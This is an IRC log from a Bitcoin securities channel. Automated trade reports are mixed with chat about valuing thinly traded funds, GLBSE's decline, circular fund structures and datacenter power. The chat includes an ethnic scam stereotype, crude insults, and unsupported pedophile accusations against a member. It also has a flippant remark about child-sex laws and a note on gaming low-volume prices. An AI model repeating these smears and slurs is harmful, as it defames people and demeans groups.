[OBSI.HRPT] 115 @ 0.0153 = 1.7595 BTC [-] Sep 28 17:32:35 Luceo: it was the acid what dissolved it Sep 28 17:35:24 [GLBSE] [OBSI.HRPT] 50 @ 0.0299 = 1.495 BTC [+] Sep 28 17:37:32 [GLBSE] [GIGAMINING] 1 @ 0.56999999 BTC [+] Sep 28 17:37:55 [GLBSE] [YABMC] 2 @ 0.07022001 = 0.1404 BTC [+] Sep 28 17:37:57 [GLBSE] [YABMC] 1 @ 0.07022 BTC [-] Sep 28 17:38:15 [GLBSE] [GIGAMINING] 5 @ 0.57 = 2.85 BTC [+] Sep 28 17:41:17 [GLBSE] [GIGAMINING] 1 @ 0.568 BTC [-] Sep 28 17:42:16 [GLBSE] [GIGAMINING] 10 @ 0.578 = 5.78 BTC [+] Sep 28 17:43:24 [MPEX] [S.MPOE] 9000 @ 0.00036471 = 3.2824 BTC [-] Sep 28 17:43:39 [GLBSE] [GIGAMINING] 1 @ 0.5945 BTC [+] Sep 28 17:43:55 [GLBSE] [GIGAMINING] 3 @ 0.5947 = 1.7841 BTC [+] Sep 28 17:44:25 [GLBSE] [GIGAMINING] 1 @ 0.5974 BTC [+] Sep 28 17:44:50 [GLBSE] [GIGAMINING] 1 @ 0.6 BTC [+] Sep 28 17:45:04 [GLBSE] [ASICMINER] 1 @ 0.1142 BTC [-] Sep 28 17:59:50 I dunno Sep 28 17:59:59 theres so many people quitting glbse that Im not sure whos quitting anymore Sep 28 18:00:06 usagi: btw, is fpgamining toxic now or not/ Sep 28 18:00:10 because I keep seeing people buy it Sep 28 18:09:27 [GLBSE] [ASICMINER] 10 @ 0.11423999 = 1.1424 BTC [+] Sep 28 18:09:59 EskimoBob: I asked usagi specifically because he had recommended fpgamining before all this shit started Sep 28 18:12:09 EskimoBob: who knows Sep 28 18:13:02 Im giving him the chance to give such an answer Sep 28 18:13:15 or he could also say fpgaminer is legit and isnt a scam, but hes exiting anyhow Sep 28 18:14:05 [MPEX] [S.MPOE] 16400 @ 0.00036643 = 6.0095 BTC [+] Sep 28 18:14:23 EskimoBob: Im not investing in fpgamining Sep 28 18:14:30 so Im not sure what you're going on about Sep 28 18:16:33 EskimoBob: okay, so if you're in a troll mood, what do you think about bakewell? ;) Sep 28 18:17:32 no, I just wanted to know what usagi thought about fpgamining now Sep 28 18:17:43 that does not imply Im buying into fpgamining Sep 28 18:17:49 nor does it imply I ever was going to Sep 28 18:18:26 no, but you said I dont know what Im talking about Sep 28 18:22:46 EskimoBob: Im giving you an opportunity to troll, btw, Sep 28 18:22:53 tell me what you think of bakewell Sep 28 18:28:58 i think he stays baked Sep 28 18:41:06 [MPEX] [F.GIGA.ETF] 7353 @ 0.00044037 = 3.238 BTC [+] Sep 28 18:41:07 [MPEX] [S.MPOE] 17600 @ 0.00036705 = 6.4601 BTC [+] Sep 28 18:41:09 [MPEX] [S.MPOE] 6930 @ 0.00036949 = 2.5606 BTC [+] Sep 28 18:41:31 [GLBSE] [GIGAMINING] 2 @ 0.59000001 = 1.18 BTC [-] Sep 28 18:50:50 [GLBSE] [ASICMINER] 12 @ 0.11423999 = 1.3709 BTC [+] Sep 28 18:50:51 [GLBSE] [ASICMINER] 30 @ 0.11433999 = 3.4302 BTC [+] Sep 28 18:50:53 [GLBSE] [ASICMINER] 57 @ 0.11444 = 6.5231 BTC [+] Sep 28 19:03:44 [GLBSE] [OBSI.HRPT] 10 @ 0.024 = 0.24 BTC [-] Sep 28 19:03:46 [GLBSE] [OBSI.HRPT] 45 @ 0.02301 = 1.0355 BTC [-] Sep 28 19:03:47 [GLBSE] [OBSI.HRPT] 10 @ 0.023 = 0.23 BTC [-] Sep 28 19:03:47 [GLBSE] [OBSI.HRPT] 30 @ 0.02 = 0.6 BTC [-] Sep 28 19:03:49 [GLBSE] [OBSI.HRPT] 50 @ 0.019 = 0.95 BTC [-] Sep 28 19:03:50 [GLBSE] [OBSI.HRPT] 50 @ 0.018 = 0.9 BTC [-] Sep 28 19:03:51 [GLBSE] [OBSI.HRPT] 50 @ 0.017 = 0.85 BTC [-] Sep 28 19:03:52 [GLBSE] [OBSI.HRPT] 5 @ 0.016 = 0.08 BTC [-] Sep 28 19:03:58 EskimoBob: well, im trying to figure out if hes a scam or not Sep 28 19:04:07 I mean, he put a photo of himself up and his information and everything Sep 28 19:07:05 [MPEX] [S.MPOE] 9100 @ 0.00036974 = 3.3646 BTC [+] Sep 28 19:07:06 [MPEX] [S.MPOE] 1400 @ 0.00037009 = 0.5181 BTC [+] Sep 28 19:08:00 [GLBSE] [BITBOND] 1 @ 0.3596 BTC [-] Sep 28 19:11:26 [GLBSE] [ZETA-MINING] 10 @ 0.17789 = 1.7789 BTC [+] Sep 28 19:14:28 [GLBSE] [RAREEARTH] 1 @ 0.00985001 BTC [-] Sep 28 19:14:30 [GLBSE] [RAREEARTH] 3 @ 0.00985 = 0.0296 BTC [-] Sep 28 19:16:04 [GLBSE] [GIGAMINING] 2 @ 0.59999999 = 1.2 BTC [+] Sep 28 19:16:51 EskimoBob: so, what Im thinking is Sep 28 19:16:53 thats not him Sep 28 19:16:56 thats not his address Sep 28 19:17:02 and hes actually a nigerian Sep 28 19:17:33 I never saw a photo of pirate Sep 28 19:18:35 [GLBSE] [GIGAMINING] 1 @ 0.6 BTC [+] Sep 28 19:19:46 [GLBSE] [GOLD] 8 @ 0.00979004 = 0.0783 BTC [-] Sep 28 19:19:47 [GLBSE] [GOLD] 32 @ 0.00979003 = 0.3133 BTC [-] Sep 28 19:19:50 [GLBSE] [GIGAMINING] 2 @ 0.60769999 = 1.2154 BTC [+] Sep 28 19:23:55 EskimoBob: well Sep 28 19:24:09 it'd be nice if CPA was a community supported board ran insurance and rating agency Sep 28 19:24:46 it'd be better if people quit IPOing on glbse Sep 28 19:25:05 and instead IPO through large scale investment banks Sep 28 19:25:16 EskimoBob: well, we need a standard for NAV anyhow Sep 28 19:25:22 nefario cant keep bids on the market Sep 28 19:25:35 well, he tried to Sep 28 19:25:40 and instead it just removed ALL bids Sep 28 19:25:42 so we cant use best bid Sep 28 19:25:56 best bid often is a tiny fraction of the lowest ask Sep 28 19:26:01 EskimoBob: not here it doesnt Sep 28 19:26:17 on glbse Sep 28 19:26:37 we cant use highest bid because its unreasonably too low, we cant use lowest ask because trolls like you have a fit Sep 28 19:27:02 we cant use trading average because we'd need a 30 day trading average because the volume is so low Sep 28 19:28:27 so what, 24 hour? 7 day? average Sep 28 19:28:31 too easy to game Sep 28 19:29:13 very few assets have enough volume to adequately state the NAV as typically used in GAAP Sep 28 19:29:18 [GLBSE] [GOLD] 10 @ 0.00949999 = 0.095 BTC [-] Sep 28 19:29:22 imsaguy2: yes, exactly Sep 28 19:29:27 thats the point Im trying to make Sep 28 19:29:36 [GLBSE] [GIGAMINING] 4 @ 0.607 = 2.428 BTC [-] Sep 28 19:29:51 lol Sep 28 19:29:51 EskimoBob: too easy to game Sep 28 19:29:51 there's low volume Sep 28 19:29:53 if I know I've got a report coming up Sep 28 19:30:01 I'll make a trade at that time Sep 28 19:30:05 so I can push the price where I want Sep 28 19:30:08 exactly Sep 28 19:30:22 at least with lowest ask its hard to game to make the price go up Sep 28 19:30:55 I'd say a 5 day trailing low ask would be the best bet Sep 28 19:31:19 [GLBSE] [GIGAMINING] 6 @ 0.607 = 3.642 BTC [-] Sep 28 19:31:20 beceause the bids suck ass Sep 28 19:31:37 [GLBSE] [OBSI.HRPT] 1 @ 0.02989999 BTC [+] Sep 28 19:31:38 [GLBSE] [OBSI.HRPT] 119 @ 0.0299 = 3.5581 BTC [+] Sep 28 19:31:39 until nef can implement overbooking on the bid side and not actually fuck it up Sep 28 19:31:48 there will always be a weak bid side Sep 28 19:31:49 yeah Sep 28 19:31:57 EskimoBob: and this is why you're a troll Sep 28 19:31:59 troll harder Sep 28 19:32:12 How would you do it EskimoBob? Sep 28 19:32:18 value an asset on 2 shares of bids? Sep 28 19:32:33 EskimoBob: a lot of the time bids are less than half of the lowest ask, some assets have NO bids Sep 28 19:32:37 so what, we value them as zero? Sep 28 19:32:41 how does that make sense? Sep 28 19:32:51 "make think" Sep 28 19:33:02 [GLBSE] [GIGAMINING] 1 @ 0.6077 BTC [+] Sep 28 19:33:06 is there a language barrier here? Sep 28 19:33:27 [MPEX] [F.GIGA.ETF] 1347 @ 0.00044037 = 0.5932 BTC [+] Sep 28 19:33:28 EskimoBob: wrong Sep 28 19:33:29 [MPEX] [F.GIGA.ETF] 2153 @ 0.00044037 = 0.9481 BTC [+] Sep 28 19:33:41 [GLBSE] [GIGAMINING] 1 @ 0.615 BTC [+] Sep 28 19:33:42 How many people keep any sort of coin in GLBSE? Sep 28 19:33:47 most people withdraw right away Sep 28 19:33:51 because they don't trust nef to get hacked Sep 28 19:33:59 last trade is worthless if the last trade was a panic sell Sep 28 19:34:09 imsaguy2: not get hacked Sep 28 19:34:23 EskimoBob: but thats the same thing Sep 28 19:34:30 [GLBSE] [GIGAMINING] 1 @ 0.618 BTC [+] Sep 28 19:34:40 if you use last trade or highest bid, any outside party can go and bomb your NAV Sep 28 19:34:42 if there was any sort of real volume, the fund manager wouldn't have that control Sep 28 19:34:44 that's the whole point Sep 28 19:35:04 wall street volume Sep 28 19:35:12 I'm not saying that Sep 28 19:35:27 the term "bid wall" doesnt have any conceptual meaning on glbse. Sep 28 19:35:59 [GLBSE] [GIGAMINING] 4 @ 0.6192 = 2.4768 BTC [+] Sep 28 19:36:05 5 or 7 day average ask could work, but glbse doesnt generate that automatically Sep 28 19:36:23 probably some sort of average between asks and bids Sep 28 19:36:48 all NAVs are fake. Sep 28 19:36:50 period. Sep 28 19:37:08 NAV, net asset value. Sep 28 19:37:26 using a ruler. Sep 28 19:39:19 no, I know exactly how long my dick is, your mother has a habit of measuring dicks in her quest for the world's largest cock. Sep 28 19:40:31 lol Sep 28 19:40:45 yeah, IRC is a realtime medium Sep 28 19:41:07 EskimoBob: and NAV would only make sense for funds anyhow Sep 28 19:41:14 let's assume the reason someone doesn't respond is that they're clueless, and then mock them based on that assumption Sep 28 19:41:22 there arent many funds on GLBSE Sep 28 19:41:27 because clearly that's the respectful way to approach online interaction Sep 28 19:41:28 copumpkin: yeah, some of us just want a fucking pepsi. Sep 28 19:42:11 oh, my bad Sep 28 19:42:20 I was in #bitcoin talking with gmaxwell Sep 28 19:42:36 there's more to life than talking with a troll that bitches but has no real solution Sep 28 19:42:43 EskimoBob: so if we're talking about, say, BMF Sep 28 19:42:51 are we considering it an open ended fund or a closed end fund? Sep 28 19:43:06 [GLBSE] [NASTY] 5 @ 0.3699 = 1.8495 BTC [-] Sep 28 19:43:07 [GLBSE] [NASTY] 2 @ 0.37 = 0.74 BTC [+] Sep 28 19:43:21 yes. Sep 28 19:43:32 I assume once BMF's IPO is done, no more will ever be issued Sep 28 19:44:35 which also means, as a closed end fund, the current trading price range is not going to realistically reflect on the NAV anyhow Sep 28 19:45:10 Nevermind. I was wrong. You were right. You win. Sep 28 19:45:59 ha ha imsaguy2 trolled EskimoBob Sep 28 19:46:19 [GLBSE] [NASTY] 4 @ 0.37 = 1.48 BTC [+] Sep 28 19:46:39 I'm not wasting my time. I have better things to do. Sep 28 19:47:06 [GLBSE] [GOLD] 9 @ 0.00949999 = 0.0855 BTC [-] Sep 28 19:49:44 [MPEX] [O.BTCUSD.P050T] 1 @ 0.02216641 BTC [-] Sep 28 20:01:06 [MPEX] [S.MPOE] 12498 @ 0.00037009 = 4.6254 BTC [+] Sep 28 20:01:07 [MPEX] [S.MPOE] 7502 @ 0.00037073 = 2.7812 BTC [+] Sep 28 20:03:19 [GLBSE] [BITCOINMINV] 1 @ 0.12499999 BTC [+] Sep 28 20:03:40 [GLBSE] [BITCOINMINV] 1 @ 0.00110001 BTC [-] Sep 28 20:13:23 Obsi: apparently you're a scammer for buying back all the shares at ipo price Sep 28 20:14:09 [GLBSE] [BMMO] 3 @ 0.03500019 = 0.105 BTC [+] Sep 28 20:14:10 that's what happens when you do biz with whiny children that haven't even had a lemonade stand Sep 28 20:14:26 [GLBSE] [OBSI.HRPT] 3 @ 0.0299 = 0.0897 BTC [+] Sep 28 20:15:03 Obsi: I agree =/ Sep 28 20:16:23 What's this about CPA dissolving? Sep 28 20:17:16 dunno Sep 28 20:17:47 sucks... market is falling all over itself Sep 28 20:18:07 yup Sep 28 20:18:13 I think this is partly my fault Sep 28 20:18:17 I didnt roll over for nefario Sep 28 20:18:23 now everyones getting part of that Sep 28 20:21:43 "Nefario used to work for Intersango but got fired when he froze my account the first time." <-- is that true? Sep 28 20:21:50 wait Sep 28 20:21:51 what? Sep 28 20:21:55 goat said that Sep 28 20:22:11 https://bitcointalk.org/index.php?topic=112551.msg1227800#msg1227800 Sep 28 20:24:46 how the hell do you people find so much time to read the forum Sep 28 20:25:24 I read it on the crapper Sep 28 20:25:25 yeah but theres a lot of fucking traffic Sep 28 20:25:26 its nuts Sep 28 20:25:32 best to keep crap piles like that in one room Sep 28 20:26:12 [MPEX] [F.GIGA.ETF] 6800 @ 0.00044037 = 2.9945 BTC [+] Sep 28 20:26:56 well, I have another long friday... back in 4-6ish hours I suppose Sep 28 20:27:51 this channel is a barrel of laghs Sep 28 20:27:53 laugh* Sep 28 20:27:55 s Sep 28 20:29:27 rg: you hear what the guy who owns enzu did? Sep 28 20:30:08 no Sep 28 20:30:23 deleted the vpses that ran atheme.org and cia.vc Sep 28 20:30:41 nice Sep 28 20:30:46 he claims they wernt marked properly in the db, even though its on neno's private box. Sep 28 20:30:52 i cant say anything bad about them tho right now Sep 28 20:30:56 i scored some really cheap hardware the other day Sep 28 20:31:09 it makes me rethink who I want DMC to do business with Sep 28 20:31:47 "do business with" ? Sep 28 20:31:59 kuzetsa: long term plan stuff Sep 28 20:32:04 and the website is down Sep 28 20:32:04 ah Sep 28 20:32:06 (glbse) Sep 28 20:32:24 so are you really building a datacenter? Sep 28 20:32:58 too bad solar isn't a long-term "free ride" Sep 28 20:33:15 well Sep 28 20:33:24 free ride is a loaded term Sep 28 20:33:51 a large scale solar and wind installation trades money now for vastly decreased operation costs later. Sep 28 20:33:52 [GLBSE] [KRAKEN] 24 @ 0.0089 = 0.2136 BTC [+] Sep 28 20:34:03 it also acts a form of insurance against ever rising electricity prices Sep 28 20:34:09 potentially cheaper than buying energy from the incumbent utility service Sep 28 20:34:19 its a lot cheaper. Sep 28 20:34:24 [GLBSE] [KRAKEN] 100 @ 0.0089 = 0.89 BTC [+] Sep 28 20:34:34 yeah, maybe. Sep 28 20:34:56 I did the math without including price increases a few pages ago in the DMC thread Sep 28 20:35:09 several metric fucktons cheaper over a 30 year period Sep 28 20:35:21 replacing batteries in your AGM (deep cycle-type) storage bank and any solar cells lost to natural disaster (hail, etc.) is expensive though Sep 28 20:35:38 nope, no power storage Sep 28 20:35:47 thats an extreme cost sink Sep 28 20:35:54 ??? Sep 28 20:36:03 you do realize how much power a DC burns, right? Sep 28 20:36:16 [GLBSE] [KRAKEN] 15 @ 0.0089 = 0.1335 BTC [+] Sep 28 20:36:20 Diablo-D3 : i can see the argument for illiquid assets being "0" on the book Sep 28 20:36:23 [GLBSE] [ASICMINER] 9 @ 0.11444 = 1.03 BTC [+] Sep 28 20:36:25 and taken to off-book accounting Sep 28 20:36:40 seing as I had a hand in designing one about 10 years ago, yeah, I know what a datacenter burns. Sep 28 20:37:19 kuzetsa: you install enough solar that 99% of the time solar output doesn't exceed current power usage Sep 28 20:37:42 you cant cover it all all the time Sep 28 20:37:47 but you can put a huge dent in it Sep 28 20:37:52 ooooh Sep 28 20:38:21 so you basically just offset the climate control (cooling) during daylight / premium-peak rates Sep 28 20:38:34 [GLBSE] [GOLD] 2 @ 0.00999997 = 0.02 BTC [+] Sep 28 20:38:38 if I was further south, yes, that'd be an accurate summary Sep 28 20:38:56 I chose a northern location like this to also avoid a huge part of HVAC needs Sep 28 20:38:58 [GLBSE] [SILVER] 2 @ 0.00999991 = 0.02 BTC [+] Sep 28 20:39:19 huh? Sep 28 20:39:23 Maine. Sep 28 20:39:27 why would you need less HVAC in maine? Sep 28 20:39:39 because you dont always _need_ hvac Sep 28 20:39:50 hmm Sep 28 20:39:55 you can often get away with air economizers Sep 28 20:39:57 now I feel like a dumbass Sep 28 20:40:30 just fact-checked my "I know that means high-voltage alternating current" only to be schooled (heating, ventalation, air conditioning) Sep 28 20:40:40 heh Sep 28 20:40:50 Ive never seen hvac used for power Sep 28 20:40:53 its always been cooling Sep 28 20:41:27 I can see why you'd get confused though Sep 28 20:42:09 anyhow, since Im focusing on high density computing (25-30kw per rack), Im stuck with in row cooling combined with hot aisle containment Sep 28 20:42:17 my own fault for having lived a non-zero number of years in kentucky and mississippi Sep 28 20:42:18 its the only way to drive efficiency up Sep 28 20:42:40 non-zero number of rednecks whom were dumb as a sack of hammers Sep 28 20:42:53 stupidity is infectious Sep 28 20:43:03 indeed. a non-zero amount rubbed off on me Sep 28 20:43:10 including the word: ya'll Sep 28 20:43:14 lol Sep 28 20:43:20 welp, you're screwed Sep 28 20:43:48 no amount of reading shakespeare in the original klingon will fix that Sep 28 20:43:56 heh Sep 28 20:44:05 that's something I don't miss Sep 28 20:44:41 "shakespere is for dorks" as they sad. Sep 28 20:44:42 *said Sep 28 20:44:47 it really isnt Sep 28 20:44:59 its for the 99% Sep 28 20:45:13 its all about murder and violence and rape and other awesome shit Sep 28 20:45:34 converted to modern english it's tollerable Sep 28 20:45:42 you're going backwards Sep 28 20:45:52 if its performed with the proper accent, its great Sep 28 20:45:58 "taming of the shrew" ---> "10 things I hate about you" is much more palletable Sep 28 20:46:15 *palatable Sep 28 20:46:28 no, I think you had it right to begin with Sep 28 20:46:46 dumbed down stuff sells. Sep 28 20:48:46 http://www.cinemasoldier.com/articles/2009/8/27/from-shakespeare-to-screen-how-10-things-i-hate-about-you-fa.html --- any version of "the original" couldn't hold my attention. Sep 28 20:49:00 though I hate fiction for the most part in general Sep 28 20:51:50 [MPEX] [S.MPOE] 18834 @ 0.00036965 = 6.962 BTC [-] Sep 28 20:53:08 https://www.youtube.com/watch?v=gPlpphT7n9s Sep 28 20:53:15 skip to 2:50 Sep 28 20:57:07 [GLBSE] [YABMC] 2 @ 0.07785999 = 0.1557 BTC [+] Sep 28 20:59:10 Diablo-D3: uhm. Sep 28 20:59:20 just no Sep 28 20:59:48 the original language of shakespere is uninteresting. let along the way it's pronounced Sep 28 20:59:56 *let alone Sep 28 21:00:01 !ticker fdbf Sep 28 21:00:02 or "along with" Sep 28 21:00:07 I crossed them when typing (oops) Sep 28 21:00:19 [GLBSE:FDBF] [Bid: 0.121] [Ask: 0.149253] [Spread: 0.028253] [Last: 0.149253] [24hVol: 10.895455] [7dAvg: 0.13793018] Sep 28 21:00:31 !ticker kraken Sep 28 21:01:00 [GLBSE:KRAKEN] [Bid: 0.008] [Ask: 0.0089] [Spread: 0.0009] [Last: 0.0089] [24hVol: 1.7299] [7dAvg: 0.0090013] Sep 28 21:03:51 Diablo-D3: mind if I share this log with my boyfriend? anthropology major in college and loves shakespere hehe. Sep 28 21:04:48 Smoovious lol uhm... this? http://en.wikipedia.org/wiki/Samaritan_Snare Sep 28 21:05:14 pakleds is the race in question :P Sep 28 21:05:29 [GLBSE] [GIGAMINING] 4 @ 0.6192 = 2.4768 BTC [+] Sep 28 21:06:00 trek, star wars, doctor who, stargate, various anime are the main exceptions to my hatered of fiction lol Sep 28 21:06:20 I'm a geek after all Sep 28 21:06:25 just not a fan of shakespere Sep 28 21:06:54 actually, scifi in general appeals to me... and harry potter & vampire stuff to a lesser extent. Sep 28 21:16:54 [MPEX] [S.MPOE] 31494 @ 0.00036643 = 11.5403 BTC [-] Sep 28 21:19:00 [GLBSE] [ASICMINER] 70 @ 0.11444 = 8.0108 BTC [+] Sep 28 21:23:13 [GLBSE] [GSDPT] 250 @ 0.0034 = 0.85 BTC [+] Sep 28 21:35:21 [GLBSE] [NYAN.A] 4 @ 0.9902 = 3.9608 BTC [-] Sep 28 21:41:36 [GLBSE] [MERGEDMINING] 2 @ 0.064945 = 0.1299 BTC [+] Sep 28 21:41:37 [GLBSE] [MERGEDMINING] 8 @ 0.06494996 = 0.5196 BTC [+] Sep 28 21:42:05 [MPEX] [S.MPOE] 18106 @ 0.00036377 = 6.5864 BTC [-] Sep 28 21:42:07 [MPEX] [S.MPOE] 16194 @ 0.00036652 = 5.9354 BTC [+] Sep 28 21:47:54 [GLBSE] [ASICMINER] 3 @ 0.11350001 = 0.3405 BTC [-] Sep 28 21:52:50 Hi can anyone tell me what investment funds there are on the GLBSE and if there any investment funds of investment funds on the GLBSE. Sep 28 21:55:29 I own a investment fund named FDBF (Flying Dutchman Bitcoin Fund) Sep 28 21:55:53 https://bitcointalk.org/index.php?topic=100521.0 Sep 28 22:01:50 i think btc-mining also runs one Sep 28 22:07:25 [MPEX] [S.MPOE] 6371 @ 0.00036522 = 2.3268 BTC [-] Sep 28 22:20:30 I only think with the severed heads of my enemies. Sep 28 22:20:42 you have enemies now ? Sep 28 22:20:48 all two of them Sep 28 22:20:52 name one Sep 28 22:21:07 Imma call him Bob Sep 28 22:21:18 shitty name. Sep 28 22:21:30 don't blame me Sep 28 22:26:04 [GLBSE] [OBSI.HRPT] 15 @ 0.02989999 = 0.4485 BTC [-] Sep 28 22:26:05 [GLBSE] [OBSI.HRPT] 14 @ 0.0299 = 0.4186 BTC [+] Sep 28 22:32:32 [MPEX] [S.MPOE] 55929 @ 0.00036649 = 20.4974 BTC [+] Sep 28 22:33:10 [GLBSE] [GIGAMINING] 4 @ 0.59000001 = 2.36 BTC [-] Sep 28 22:33:12 [GLBSE] [GIGAMINING] 1 @ 0.59 BTC [-] Sep 28 22:35:12 yeah Sep 28 22:38:34 [GLBSE] [COGNITIVE] 1 @ 0.43041003 BTC [-] Sep 28 22:38:35 [GLBSE] [COGNITIVE] 1 @ 0.43041 BTC [-] Sep 28 22:38:37 [GLBSE] [COGNITIVE] 1 @ 0.4304 BTC [-] Sep 28 22:38:37 [GLBSE] [COGNITIVE] 1 @ 0.4302 BTC [-] Sep 28 22:38:38 [GLBSE] [COGNITIVE] 9 @ 0.4301 = 3.8709 BTC [-] Sep 28 22:38:39 [GLBSE] [COGNITIVE] 1 @ 0.4152 BTC [-] Sep 28 22:38:41 [GLBSE] [COGNITIVE] 1 @ 0.41 BTC [-] Sep 28 22:38:42 [GLBSE] [COGNITIVE] 1 @ 0.4012 BTC [-] Sep 28 22:38:43 [GLBSE] [COGNITIVE] 4 @ 0.401 = 1.604 BTC [-] Sep 28 22:38:44 [GLBSE] [COGNITIVE] 1 @ 0.4002 BTC [-] Sep 28 22:38:53 [GLBSE] [COGNITIVE] 1 @ 0.4002 BTC [-] Sep 28 22:39:49 [GLBSE] [NASTY] 1 @ 0.365 BTC [-] Sep 28 22:39:49 [GLBSE] [NASTY] 2 @ 0.36 = 0.72 BTC [-] Sep 28 22:39:51 [GLBSE] [NASTY] 10 @ 0.35 = 3.5 BTC [-] Sep 28 22:39:52 [GLBSE] [NASTY] 2 @ 0.349 = 0.698 BTC [-] Sep 28 22:39:53 [GLBSE] [NASTY] 2 @ 0.348 = 0.696 BTC [-] Sep 28 22:39:54 [GLBSE] [NASTY] 2 @ 0.3473 = 0.6946 BTC [-] Sep 28 22:39:56 [GLBSE] [NASTY] 11 @ 0.3471 = 3.8181 BTC [-] Sep 28 22:39:57 [GLBSE] [NASTY] 2 @ 0.3403 = 0.6806 BTC [-] Sep 28 22:39:58 [GLBSE] [NASTY] 4 @ 0.3012 = 1.2048 BTC [-] Sep 28 22:39:59 [GLBSE] [NASTY] 21 @ 0.301 = 6.321 BTC [-] Sep 28 22:39:59 [GLBSE] [NASTY] 3 @ 0.3002 = 0.9006 BTC [-] Sep 28 22:40:00 [GLBSE] [NASTY] 14 @ 0.3 = 4.2 BTC [-] Sep 28 22:47:38 [GLBSE] [OBSI.HRPT] 100 @ 0.0299 = 2.99 BTC [+] Sep 28 22:58:28 [MPEX] [S.MPOE] 4828 @ 0.00036401 = 1.7574 BTC [-] Sep 28 22:58:29 [MPEX] [S.MPOE] 50406 @ 0.00036652 = 18.4748 BTC [+] Sep 28 22:58:31 [MPEX] [S.MPOE] 3866 @ 0.00036735 = 1.4202 BTC [+] Sep 28 22:59:53 the co is actually just cause I'm a math nerd Sep 28 23:00:05 hmmm, where do all these investment funds invest into? other investment funds? Sep 28 23:00:37 jurov: incestuous orgy of financial sex Sep 28 23:00:38 mmm Sep 28 23:00:56 Which invest in other investmenst funds, which.... until you reach the ponzi Sep 28 23:01:01 jurov yes. Sep 28 23:01:25 basically the random idiot has found the following solution to "if you pay investors with new investor money it's a ponzi" : Sep 28 23:01:39 A makes fund, B makes fund. A pays investors with new B investor money Sep 28 23:01:45 and B pays investors with new A investor money Sep 28 23:01:45 mircea_popescu: ... Sep 28 23:01:50 and then... it's INSURED Sep 28 23:01:51 THATS GENIUS Sep 28 23:01:55 wait Sep 28 23:02:08 ya, you're already part of it. Sep 28 23:02:10 mircea_popescu: that cant possibly work Sep 28 23:02:26 shouldnt fund a buy shares of fund b, then fund b buy shares of fund a? Sep 28 23:02:51 well, obsi pays dividend to dmc, dmc buys it's own shares from nyan, nyan uses proceeds to buy it's own shares etc. Sep 28 23:03:05 Didn't the pedophile did the same thing? Sep 28 23:03:14 Yeah, that's the postponzi structure Sep 28 23:03:15 mircea_popescu: except dmc owns no nyan or cpa or bmf Sep 28 23:03:19 http://polimedia.us/bitcoin/mpex.php?mpsic=B.MPCD.A Sep 28 23:03:23 ciuciu!*@* added to ignore list. Sep 28 23:03:45 Or the new not so blatant ponzi structure Sep 28 23:03:57 the nblonzi Sep 28 23:04:00 not blatant ponzi Sep 28 23:05:30 hrrrrrrrrrrrrm Sep 28 23:05:32 okay so Sep 28 23:05:37 if fund a buys fund b shares Sep 28 23:05:40 and fund b buys fund a shares Sep 28 23:05:51 and new investor money gets locked up into the a/b loop Sep 28 23:06:00 when does it cease to be fucking hilarious Sep 28 23:06:08 eventually. Sep 28 23:06:20 ciuciu: can you elaborate on why you keep calling him the pedophile? Sep 28 23:06:26 mircea_popescu: holy crap Sep 28 23:06:29 can you imagine the dividends Sep 28 23:06:37 without justification, it just sounds kinda childish Sep 28 23:06:37 yes. Sep 28 23:06:46 ciuciu: so moot is a pedophile? Sep 28 23:06:51 moot is not a pedophile Sep 28 23:06:54 copumpkin wait. you said childish ?! INFINITE POWAR Sep 28 23:06:54 moot is the little girl Sep 28 23:07:09 is kim dotcom a pedophile? Sep 28 23:07:46 ciuciu: do you have evidence to support that claim? Sep 28 23:08:09 I have, can you point me to the specific part? Sep 28 23:08:16 didn't the kim guy get convicted of embezzlement/fraud/etc ? Sep 28 23:08:21 mircea_popescu: no Sep 28 23:08:38 infact the prime minister of new zealand publicly apologized to him Sep 28 23:08:42 hm Sep 28 23:08:46 ciuciu: great claims require great evidence Sep 28 23:08:55 you just end up sounding stupid the way you're doing it now Sep 28 23:09:14 so you wanted to find it? Sep 28 23:09:16 I see Sep 28 23:09:42 ah, of course Sep 28 23:10:26 yes, the porn has never involved children in my experience Sep 28 23:10:34 and I haven't seen gore pics from him either Sep 28 23:10:45 posting porn isn't illegal Sep 28 23:10:49 he did get banned from #bitcoin-otc for it Sep 28 23:11:00 but porn does not make him a pedophile Sep 28 23:11:08 the problem with porn is Sep 28 23:11:15 the world does not have a global minimum age Sep 28 23:11:28 some countries its legal to _fuck_ children who are like 8 or 9 Sep 28 23:11:30 and he posted it? Sep 28 23:11:39 you cant start screaming pedophile if they're in their own country doing it Sep 28 23:12:01 you CAN start bombing them, but they never seem to have any oil Sep 28 23:12:06 [MPEX] [O.BTCUSD.P050T] 1 @ 0.02216641 BTC [-] Sep 28 23:12:45 I have yet to see any evidence of that, and until I see evidence for it, I'm not going to hold that against him Sep 28 23:13:11 Ive seen some questionable stuff on his imgboard, but I cant tell Sep 28 23:13:15 "hey guys, I hear ciuciu murdered a hooker. The evidence is online if you know where to look. And no, I won't tell you where" Sep 28 23:13:24 there are some porn actresses that specialize in faux-underage shit Sep 28 23:13:41 its creepy and weird, but you STILL cant start claiming people are pedophiles Sep 28 23:13:52 oh, the serial killer is gonna keep calling mircea_popescu names Sep 28 23:13:55 fair enough Sep 28 23:14:07 http://polimedia.us/dtng/c/src/134885778537.gif Sep 28 23:14:15 its best to just stay off his gypsy site and be done with it Sep 28 23:14:16 lol Sep 28 23:14:21 can we move on ? Sep 28 23:14:46 hard to move on when I'm afraid the serial killer will get me next :( Sep 28 23:14:54 ciuciu: please don't hurt me, I promise I won't tell Sep 28 23:14:55 you're beating a dead hooker :D Sep 28 23:15:41 anyway, if i move dtng on ciuciu-is-gay.ca will everyone be happy ? Sep 28 23:16:04 ciuciu: I thought you might think that, since I'm emulating your behavior :) Sep 28 23:16:44 then show it and I'll stop thinking you're intellectually dishonest Sep 28 23:17:12 he's hosting the equivalent of 4chan Sep 28 23:17:18 do you have evidence that he, mircea_popescu, posted it? Sep 28 23:17:27 i posted what Sep 28 23:17:43 evidence? Sep 28 23:19:13 I hope it's solid evidence, if you're going to go around calling someone a pedophile over it Sep 28 23:20:25 aha, the most solid of evidence: repetition Sep 28 23:20:51 copumpkin you realise on most people's screens you're talking to yourself rite ? Sep 28 23:20:53 you have crushed my argument with your well reasoned points. I hereby concede Sep 28 23:22:27 lol Sep 28 23:22:57 ciuciu: yeah, that's intellectually honest too. Someone questions your conclusions so obviously he too must be a pedophile Sep 28 23:23:09 "YOU DARE CRITICIZE MY BAD LOGIC? YOU TOO MUST BE A PEDOPHILE" Sep 28 23:23:23 anyway, farewell :) Sep 28 23:27:42 whose? Sep 28 23:36:29 [GLBSE] [GIGAMINING] 2 @ 0.58000001 = 1.16 BTC [-] Sep 28 